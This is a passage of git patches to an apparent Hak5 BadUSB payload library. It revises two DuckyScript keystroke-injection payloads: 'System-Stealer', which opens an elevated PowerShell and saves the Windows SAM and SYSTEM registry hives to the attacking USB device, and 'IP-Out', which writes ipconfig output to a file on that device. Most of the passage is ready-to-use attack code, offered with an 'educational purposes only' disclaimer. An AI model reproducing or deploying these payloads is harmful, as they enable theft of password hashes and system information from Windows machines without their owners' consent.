FALSE) && ($MAX_TRIES > 0)) - DELAY #CHECK_INTERVAL - $MAX_TRIES = ($MAX_TRIES - 1) - END_WHILE - IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN - $_OS = WINDOWS - END_IF - - REM_BLOCK EXAMPLE USAGE AFTER EXTENSION - IF ($_OS == WINDOWS) THEN - STRING HELLO WINDOWS! - ELSE - STRING HELLO WORLD! - END_IF - END_REM -END_EXTENSION -IF $_OS != WINDOWS - STOP_PAYLOAD -END_IF -ATTACKMODE HID STORAGE -DELAY 500 -GUI r -DELAY 300 -STRINGLN Powershell -DELAY 1000 -DEFINE #DRIVELABEL DUCKY -STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } -WAIT_FOR_STORAGE_ACTIVITY -WAIT_FOR_STORAGE_INACTIVITY -ALT F4 -ATTACKMODE OFF -HIDE_PAYLOAD From 61eb88ab6c0b5e52ce7aafa6283483bce9fc8148 Mon Sep 17 00:00:00 2001 
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Tue, 22 Oct 2024 14:41:32 -0400 Subject: [PATCH 18/19] Update payload.txt --- .../exfiltration/System-Stealer/payload.txt | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/payloads/library/exfiltration/System-Stealer/payload.txt b/payloads/library/exfiltration/System-Stealer/payload.txt index 85d2db0..23fdd6c 100644 --- a/payloads/library/exfiltration/System-Stealer/payload.txt +++ b/payloads/library/exfiltration/System-Stealer/payload.txt @@ -47,24 +47,28 @@ EXTENSION PASSIVE_WINDOWS_DETECT END_IF END_REM END_EXTENSION +REM Change $DRIVELABEL to the storage label of your duck +DEFINE #DRIVELABEL DUCKY IF ($_OS == WINDOWS) THEN - INJECT_MOD GUI R + GUI r DELAY 500 - STRING cmd + STRING powershell DELAY 1000 CTRL-SHIFT-ENTER DELAY 750 LEFT ENTER DELAY 1000 - REM Change $DRIVELABEL to the storage label of your duck - DEFINE #DRIVELABEL D: - STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save + STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter + DELAY 250 + STRINGLN reg save HKLM\sam $DriveLetter/sam.save WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY - STRINGLN reg save HKLM\system #DRIVELABEL/system.save + STRINGLN reg save HKLM\system $DriveLetter/system.save WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY + ALT F4 ELSE + ATTACKMODE OFF STOP_PAYLOAD END_IF From cacb21ad7e7a3e4de47b1b30d3361079c012b4fc Mon Sep 17 00:00:00 2001 From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com> Date: Thu, 24 Oct 2024 14:58:57 -0400 Subject: [PATCH 19/19] Removed Second "#DRIVELABEL" variable --- payloads/library/exfiltration/IP-Out/payload.txt | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) 
diff --git a/payloads/library/exfiltration/IP-Out/payload.txt b/payloads/library/exfiltration/IP-Out/payload.txt index 016761b..111d444 100644 --- a/payloads/library/exfiltration/IP-Out/payload.txt +++ b/payloads/library/exfiltration/IP-Out/payload.txt @@ -3,7 +3,7 @@ REM Author: Mavisinator30001 REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB REM Target: Any Windows System REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY -DEFINE #DRIVELABEL D +DEFINE #DRIVELABEL DUCKY EXTENSION PASSIVE_WINDOWS_DETECT REM VERSION 1.1 REM AUTHOR: Korben @@ -55,7 +55,6 @@ GUI r DELAY 300 STRINGLN Powershell DELAY 1000 -DEFINE #DRIVELABEL DUCKY STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY